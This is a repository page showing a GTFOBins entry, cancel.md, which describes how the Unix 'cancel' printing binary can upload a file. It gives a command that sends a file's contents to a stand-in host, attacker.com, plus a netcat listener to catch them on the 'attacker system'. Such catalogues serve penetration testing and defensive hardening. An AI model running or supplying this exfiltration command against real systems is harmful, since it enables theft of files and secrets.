This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
63147892c4a8f63c5a81705786ed66d1fa6048dd
GTFOBins.github.io
/
_gtfobins
/
cancel.md
0rbz
63147892c4
Create cancel.md (
#43
)
...
* Add cancel.md
2018-12-31 09:38:20 +01:00
318 B
Raw
Blame
History
functions
functions
file-upload
description
code
Send contents of a file to a TCP port. Run `nc -nlvp $RPORT > "file to save"` on the attacker system to capture the contents.
RHOST=attacker.com RPORT=12345 LFILE=file_to_send cancel -u "$(cat $LFILE)" -h $RHOST:$RPORT
Reference in New Issue
View Git Blame
Copy Permalink